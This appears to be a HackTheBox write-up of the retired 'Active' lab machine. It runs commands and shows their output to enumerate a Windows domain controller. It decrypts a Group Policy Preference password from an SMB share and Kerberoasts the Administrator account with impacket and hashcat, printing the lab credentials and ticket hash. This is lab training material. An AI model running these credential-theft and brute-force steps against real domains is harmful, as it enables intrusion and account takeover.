- Published on
HTB Active
- Authors
- Name
- collinhacks
- @collinhacks
Active
Enumeration
nmap all ports, full enumerate
nmap -p- -sV -A <ip> --open -o full-enumerate.nmap
└─$ nmap -p- -sV -A $IP --open -o full-enumerate.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-02 23:23 EDT
Nmap scan report for 10.129.144.13
Host is up (0.036s latency).
Not shown: 53714 closed tcp ports (conn-refused), 11799 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-03 03:24:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49173/tcp open msrpc Microsoft Windows RPC
49174/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-08-03T03:25:20
|_ start_date: 2023-08-03T03:14:12
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.78 seconds
nmap (all identified TCP ports + default scripts & service versions)
nmap -p <1,2,3> -sV --script default --script http-methods --script http-headers <ip> -o <ip>-identified-ports.nmap
┌──(collinhacks㉿CH)-[~/Lab/HTB/Active]
└─$ nmap -p 53,88,135,139,389,445,464,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49173,49174 -sV --script default --script http-methods --script http-headers $IP -o identified-ports.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-02 23:27 EDT
Nmap scan report for 10.129.144.13
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-03 03:27:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-headers:
| Content-Type: text/html; charset=us-ascii
| Server: Microsoft-HTTPAPI/2.0
| Date: Thu, 03 Aug 2023 03:28:46 GMT
| Connection: close
| Content-Length: 315
|
|_ (Request type: GET)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49173/tcp open msrpc Microsoft Windows RPC
49174/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-08-03T03:28:47
|_ start_date: 2023-08-03T03:14:12
|_clock-skew: -1s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.13 seconds
nmap (vuln scan)
nmap -p <1,2,3> --script vuln <ip> -o <ip>-vuln.nmap
nothing
Port Enumeration
**Port 389
base DN:
DC=active,DC=htbnmap -n -sV --script "ldap* and not brute" $IP└─$ nmap -n -sV --script "ldap* and not brute" $IP 1 ⨯ 2 ⚙ Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-02 23:40 EDT Nmap scan report for 10.129.144.13 Host is up (0.042s latency). Not shown: 983 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-03 03:40:17Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) | ldap-rootdse: | LDAP Results | <ROOT> | currentTime: 20230803034111.0Z | subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=active,DC=htb | dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb | namingContexts: DC=active,DC=htb | namingContexts: CN=Configuration,DC=active,DC=htb | namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb | namingContexts: DC=DomainDnsZones,DC=active,DC=htb | namingContexts: DC=ForestDnsZones,DC=active,DC=htb | defaultNamingContext: DC=active,DC=htb | schemaNamingContext: CN=Schema,CN=Configuration,DC=active,DC=htb | configurationNamingContext: CN=Configuration,DC=active,DC=htb | rootDomainNamingContext: DC=active,DC=htb | supportedControl: 1.2.840.113556.1.4.319 | supportedControl: 1.2.840.113556.1.4.801 | supportedControl: 1.2.840.113556.1.4.473 | supportedControl: 1.2.840.113556.1.4.528 | supportedControl: 1.2.840.113556.1.4.417 | supportedControl: 1.2.840.113556.1.4.619 | supportedControl: 1.2.840.113556.1.4.841 | supportedControl: 1.2.840.113556.1.4.529 | supportedControl: 1.2.840.113556.1.4.805 | supportedControl: 1.2.840.113556.1.4.521 | supportedControl: 1.2.840.113556.1.4.970 | supportedControl: 1.2.840.113556.1.4.1338 | supportedControl: 1.2.840.113556.1.4.474 | supportedControl: 1.2.840.113556.1.4.1339 | supportedControl: 1.2.840.113556.1.4.1340 | supportedControl: 1.2.840.113556.1.4.1413 | supportedControl: 2.16.840.1.113730.3.4.9 | supportedControl: 2.16.840.1.113730.3.4.10 | supportedControl: 1.2.840.113556.1.4.1504 | supportedControl: 1.2.840.113556.1.4.1852 | supportedControl: 1.2.840.113556.1.4.802 | supportedControl: 1.2.840.113556.1.4.1907 | supportedControl: 1.2.840.113556.1.4.1948 | supportedControl: 1.2.840.113556.1.4.1974 | supportedControl: 1.2.840.113556.1.4.1341 | supportedControl: 1.2.840.113556.1.4.2026 | supportedControl: 1.2.840.113556.1.4.2064 | supportedControl: 1.2.840.113556.1.4.2065 | supportedControl: 1.2.840.113556.1.4.2066 | supportedLDAPVersion: 3 | supportedLDAPVersion: 2 | supportedLDAPPolicies: MaxPoolThreads | supportedLDAPPolicies: MaxDatagramRecv | supportedLDAPPolicies: MaxReceiveBuffer | supportedLDAPPolicies: InitRecvTimeout | supportedLDAPPolicies: MaxConnections | supportedLDAPPolicies: MaxConnIdleTime | supportedLDAPPolicies: MaxPageSize | supportedLDAPPolicies: MaxQueryDuration | supportedLDAPPolicies: MaxTempTableSize | supportedLDAPPolicies: MaxResultSetSize | supportedLDAPPolicies: MinResultSets | supportedLDAPPolicies: MaxResultSetsPerConn | supportedLDAPPolicies: MaxNotificationPerConn | supportedLDAPPolicies: MaxValRange | supportedLDAPPolicies: ThreadMemoryLimit | supportedLDAPPolicies: SystemMemoryLimitPercent | highestCommittedUSN: 110658 | supportedSASLMechanisms: GSSAPI | supportedSASLMechanisms: GSS-SPNEGO | supportedSASLMechanisms: EXTERNAL | supportedSASLMechanisms: DIGEST-MD5 | dnsHostName: DC.active.htb | ldapServiceName: active.htb:dc$@ACTIVE.HTB | serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb | supportedCapabilities: 1.2.840.113556.1.4.800 | supportedCapabilities: 1.2.840.113556.1.4.1670 | supportedCapabilities: 1.2.840.113556.1.4.1791 | supportedCapabilities: 1.2.840.113556.1.4.1935 | supportedCapabilities: 1.2.840.113556.1.4.2080 | isSynchronized: TRUE | isGlobalCatalogReady: TRUE | domainFunctionality: 4 | forestFunctionality: 4 |_ domainControllerFunctionality: 4 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) | ldap-rootdse: | LDAP Results | <ROOT> | currentTime: 20230803034111.0Z | subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=active,DC=htb | dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb | namingContexts: DC=active,DC=htb | namingContexts: CN=Configuration,DC=active,DC=htb | namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb | namingContexts: DC=DomainDnsZones,DC=active,DC=htb | namingContexts: DC=ForestDnsZones,DC=active,DC=htb | defaultNamingContext: DC=active,DC=htb | schemaNamingContext: CN=Schema,CN=Configuration,DC=active,DC=htb | configurationNamingContext: CN=Configuration,DC=active,DC=htb | rootDomainNamingContext: DC=active,DC=htb | supportedControl: 1.2.840.113556.1.4.319 | supportedControl: 1.2.840.113556.1.4.801 | supportedControl: 1.2.840.113556.1.4.473 | supportedControl: 1.2.840.113556.1.4.528 | supportedControl: 1.2.840.113556.1.4.417 | supportedControl: 1.2.840.113556.1.4.619 | supportedControl: 1.2.840.113556.1.4.841 | supportedControl: 1.2.840.113556.1.4.529 | supportedControl: 1.2.840.113556.1.4.805 | supportedControl: 1.2.840.113556.1.4.521 | supportedControl: 1.2.840.113556.1.4.970 | supportedControl: 1.2.840.113556.1.4.1338 | supportedControl: 1.2.840.113556.1.4.474 | supportedControl: 1.2.840.113556.1.4.1339 | supportedControl: 1.2.840.113556.1.4.1340 | supportedControl: 1.2.840.113556.1.4.1413 | supportedControl: 2.16.840.1.113730.3.4.9 | supportedControl: 2.16.840.1.113730.3.4.10 | supportedControl: 1.2.840.113556.1.4.1504 | supportedControl: 1.2.840.113556.1.4.1852 | supportedControl: 1.2.840.113556.1.4.802 | supportedControl: 1.2.840.113556.1.4.1907 | supportedControl: 1.2.840.113556.1.4.1948 | supportedControl: 1.2.840.113556.1.4.1974 | supportedControl: 1.2.840.113556.1.4.1341 | supportedControl: 1.2.840.113556.1.4.2026 | supportedControl: 1.2.840.113556.1.4.2064 | supportedControl: 1.2.840.113556.1.4.2065 | supportedControl: 1.2.840.113556.1.4.2066 | supportedLDAPVersion: 3 | supportedLDAPVersion: 2 | supportedLDAPPolicies: MaxPoolThreads | supportedLDAPPolicies: MaxDatagramRecv | supportedLDAPPolicies: MaxReceiveBuffer | supportedLDAPPolicies: InitRecvTimeout | supportedLDAPPolicies: MaxConnections | supportedLDAPPolicies: MaxConnIdleTime | supportedLDAPPolicies: MaxPageSize | supportedLDAPPolicies: MaxQueryDuration | supportedLDAPPolicies: MaxTempTableSize | supportedLDAPPolicies: MaxResultSetSize | supportedLDAPPolicies: MinResultSets | supportedLDAPPolicies: MaxResultSetsPerConn | supportedLDAPPolicies: MaxNotificationPerConn | supportedLDAPPolicies: MaxValRange | supportedLDAPPolicies: ThreadMemoryLimit | supportedLDAPPolicies: SystemMemoryLimitPercent | highestCommittedUSN: 110658 | supportedSASLMechanisms: GSSAPI | supportedSASLMechanisms: GSS-SPNEGO | supportedSASLMechanisms: EXTERNAL | supportedSASLMechanisms: DIGEST-MD5 | dnsHostName: DC.active.htb | ldapServiceName: active.htb:dc$@ACTIVE.HTB | serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb | supportedCapabilities: 1.2.840.113556.1.4.800 | supportedCapabilities: 1.2.840.113556.1.4.1670 | supportedCapabilities: 1.2.840.113556.1.4.1791 | supportedCapabilities: 1.2.840.113556.1.4.1935 | supportedCapabilities: 1.2.840.113556.1.4.2080 | isSynchronized: TRUE | isGlobalCatalogReady: TRUE | domainFunctionality: 4 | forestFunctionality: 4 |_ domainControllerFunctionality: 4 3269/tcp open tcpwrapped 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OSs: Windows, Windows 2008 R2; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 62.06 secondsldapsearch -H ldap://10.129.144.13 -xgets us something but not much# extended LDIF # # LDAPv3 # base <> (default) with scope subtree # filter: (objectclass=*) # requesting: ALL # # search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v1db1 # numResponses: 1ldapsearch -H ldap://active.htb:389/ -x -s base -b '' "(objectClass=*)" "*" +gives us the same info as our nmap 2 messages above└─$ ldapsearch -H ldap://active.htb:389/ -x -s base -b '' "(objectClass=*)" "*" + 1 ⨯ # extended LDIF # # LDAPv3 # base <> with scope baseObject # filter: (objectClass=*) # requesting: * + # # dn: currentTime: 20230803041722.0Z subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=active,DC=htb dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN =Sites,CN=Configuration,DC=active,DC=htb namingContexts: DC=active,DC=htb namingContexts: CN=Configuration,DC=active,DC=htb namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb namingContexts: DC=DomainDnsZones,DC=active,DC=htb namingContexts: DC=ForestDnsZones,DC=active,DC=htb defaultNamingContext: DC=active,DC=htb schemaNamingContext: CN=Schema,CN=Configuration,DC=active,DC=htb configurationNamingContext: CN=Configuration,DC=active,DC=htb rootDomainNamingContext: DC=active,DC=htb supportedControl: 1.2.840.113556.1.4.319 supportedControl: 1.2.840.113556.1.4.801 supportedControl: 1.2.840.113556.1.4.473 supportedControl: 1.2.840.113556.1.4.528 supportedControl: 1.2.840.113556.1.4.417 supportedControl: 1.2.840.113556.1.4.619 supportedControl: 1.2.840.113556.1.4.841 supportedControl: 1.2.840.113556.1.4.529 supportedControl: 1.2.840.113556.1.4.805 supportedControl: 1.2.840.113556.1.4.521 supportedControl: 1.2.840.113556.1.4.970 supportedControl: 1.2.840.113556.1.4.1338 supportedControl: 1.2.840.113556.1.4.474 supportedControl: 1.2.840.113556.1.4.1339 supportedControl: 1.2.840.113556.1.4.1340 supportedControl: 1.2.840.113556.1.4.1413 supportedControl: 2.16.840.1.113730.3.4.9 supportedControl: 2.16.840.1.113730.3.4.10 supportedControl: 1.2.840.113556.1.4.1504 supportedControl: 1.2.840.113556.1.4.1852 supportedControl: 1.2.840.113556.1.4.802 supportedControl: 1.2.840.113556.1.4.1907 supportedControl: 1.2.840.113556.1.4.1948 supportedControl: 1.2.840.113556.1.4.1974 supportedControl: 1.2.840.113556.1.4.1341 supportedControl: 1.2.840.113556.1.4.2026 supportedControl: 1.2.840.113556.1.4.2064 supportedControl: 1.2.840.113556.1.4.2065 supportedControl: 1.2.840.113556.1.4.2066 supportedLDAPVersion: 3 supportedLDAPVersion: 2 supportedLDAPPolicies: MaxPoolThreads supportedLDAPPolicies: MaxDatagramRecv supportedLDAPPolicies: MaxReceiveBuffer supportedLDAPPolicies: InitRecvTimeout supportedLDAPPolicies: MaxConnections supportedLDAPPolicies: MaxConnIdleTime supportedLDAPPolicies: MaxPageSize supportedLDAPPolicies: MaxQueryDuration supportedLDAPPolicies: MaxTempTableSize supportedLDAPPolicies: MaxResultSetSize supportedLDAPPolicies: MinResultSets supportedLDAPPolicies: MaxResultSetsPerConn supportedLDAPPolicies: MaxNotificationPerConn supportedLDAPPolicies: MaxValRange supportedLDAPPolicies: ThreadMemoryLimit supportedLDAPPolicies: SystemMemoryLimitPercent highestCommittedUSN: 110659 supportedSASLMechanisms: GSSAPI supportedSASLMechanisms: GSS-SPNEGO supportedSASLMechanisms: EXTERNAL supportedSASLMechanisms: DIGEST-MD5 dnsHostName: DC.active.htb ldapServiceName: active.htb:dc$@ACTIVE.HTB serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat ion,DC=active,DC=htb supportedCapabilities: 1.2.840.113556.1.4.800 supportedCapabilities: 1.2.840.113556.1.4.1670 supportedCapabilities: 1.2.840.113556.1.4.1791 supportedCapabilities: 1.2.840.113556.1.4.1935 supportedCapabilities: 1.2.840.113556.1.4.2080 isSynchronized: TRUE isGlobalCatalogReady: TRUE domainFunctionality: 4 forestFunctionality: 4 domainControllerFunctionality: 4 # search result search: 2 result: 0 Success # numResponses: 2 # numEntries: 1hydra attemtped but got nothing (thought since we had LDAPv3 could do something with it)
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.129.144.13 ldap3 -f -u -I
Not really getting anywhere with this. Let’s take a new route. ⭐
enumerate smb
How many SMB shares can we find smbmap -H 10.129.144.13
└─$ smbmap -H 10.129.144.13
[+] IP: 10.129.144.13:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Ok so 7 total shares
And “Replication” is read only so we can probably access it
smbclient to read READ ONLY shares
smbclient //active.htb/Replication hit enter til we get login since we are READ ONLY
Now that we are authenticated, we can look around for a file that can help us
Found this directory \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\ with a file Groups.xml in it get Groups.xml
Looking at the file locally we have:
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Username= active.htb\SVC_TGS
Encoded password cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
We are looking at a GPP password here. A Group Policy Preference password.
We decrypt this with gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
:GPPstillStandingStrong2k18
Exploitation
**********Port 139 & 445
Foothold
smbmap with credentials
smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H active.htb
└─$ smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H active.htb 1 ⨯
[+] IP: active.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
We have these credentials and now we can see that we can read 3 more shares so we can probably authenticate to them like we did earlier to Replication, but with the other shares:
smbclient //active.htb/<share> -U SVC_TGSthen it should prompt with password
And we get SVC_TGS user confirmed
Root
kerberoasting
We can Kerberoast here because we have a low privileged domain, with user credentials.
- First we need to use
GetUserSPnsfromimpacketto get a list of service usernames which are associated with normal user accounts. /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.129.144.13 active.htb/SVC_TGS -outputfile GetUserSPNs.out- It is important we specify
-outputfile GetUserSPNs.outbecause if there is a ticket, it will output it and we can crack it
- It is important we specify
└─$ /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.129.144.13 active.htb/SVC_TGS -outputfile GetUserSPNs.out 2 ⨯
Impacket v0.10.1.dev1+20230728.114623.fb147c3f - Copyright 2022 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-08-02 23:15:19.048952
[-] CCache file is not found. Skipping...
┌──(collinhacks㉿CH)-[~/Lab/HTB/Active]
└─$ ls
cpassword.txt full-enumerate.nmap GetUserSPNs.out GptTmpl.inf Groups.xml hash.txt hydra.restore identified-ports.nmap users.txt user.txt vuln.nmap windapsearch
┌──(collinhacks㉿CH)-[~/Lab/HTB/Active]
└─$ cat GetUserSPNs.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$fbabe10baa66adcb376bdbb6a72b16a7$446dde219b12685244a27d70c11f121acf7eed222816178d0911d32ac01c3c655a37e39913748b4e7d417f41d6b3630a1a73ce73c7d664b7727dc5d7097d1eb511d2af85ba72f93d56a907322373f9afe23b8f9c48bc3c84b0b4249c0f2654924d03e3835ebfccb06b09bb065ab0010af8d798b676c36ef9168d29ffd90a6f1f0efdbc5fc69ad025a719e068348c845df36f54d4c634f02aa7e949174e3512c67a21efb2395176e63b6d66f042762400413e41f06c25906a72528cbdb2f25db7473bad840a87d35c292de01e501ec474925a2efc381e2d4c12b1beaa9dd49a1f69d82ab9e13ca71e978faf1517cfcdcaf0027bccc834708dcb7c81ee09e1ddf31c647d657f2b65728f25627ca417cf1b026fadacaea4b4e55b618f99135099fd7af30ec33b1b537dc271b8923f75049f946ac2cf667cb8906856035fb829d8d5765e881e1e70f9e1a69c0f6b1d1a20b05875cbdd99c3291638ec69ce1b61e3c9cc78762b0d3c23917bbe9a0a0a9a4072a374e9c18cc4d80903c229162d86e1c0119b41559c423fc00abfcec506ddf928eef4ac1c7e0756135b83828eeb060eec49d2888b86b8940238a9ce0f38e032448500593e50535de7e9d9157f1164cdc359a0e596e1eb5c5050c8e6b4402c4af3aace25bcd6e4e5a99516a33c02d35648e75548cafac6b2778c2990524fa455c8fc0d12ea668c482b86a35f7c5145a656a521f0127fb793830e181a31f2df85b287e357b982a211481268f02ff168d1dcec7e348de8cc7f10b27756d74b994d785c839c9b513308b3bd8091c75a1b7af181934599548559b5339561d64cb99b32d6dbd42a7bfe975352f93e616144801595dc92c666cf1a991f5d40d103716335421984b9a2ae7851c2a7a1403a06236cd07e7884255c225feb63041558022159cb87bd7431f5a97bda6f6fd7c71a2c89f235a59829bb0e12df93a0fb1d7bb7d5a736ec864a0c1c7d9dd04431a0746578647c60d4d4f197d27d911f3e47c9db99a42fda7f5d526ae02e6e0b5cd1ab55274e47ea0239e39dce333e32e509933faf369e689dbbf10fdd94f25698990334a44af4e9cb66342c20b0369710ac20a781b867ea98f5d2b157a5b21d192c5e2555db9b48e1ff2e9f1647fee7ae7048960f4063aacd8ee9b18ba5fb7c2987fcf73714407989c078c548719a1b7a69d59eef0960f7b28e771c64bd527ef60cae6a3ebdc9a9982ac8a2401909793bd674d74c17f242946b221e3df7d0
Seems as we got a ticket for the Administrator
hashcat time
hashcat GetUserSPNs.out --wordlist /usr/share/wordlists/rockyou.txt
= Ticketmaster1968
Authenticate as root
Now we can authenticate with smbclient
smbclient //active.htb/Users -U Administrator
Ticketmaster1968
Useful resource links
Lessons Learned
- Using SMB to enumerate even though LDAP was being fired in my face from
nmap - Kerberoasting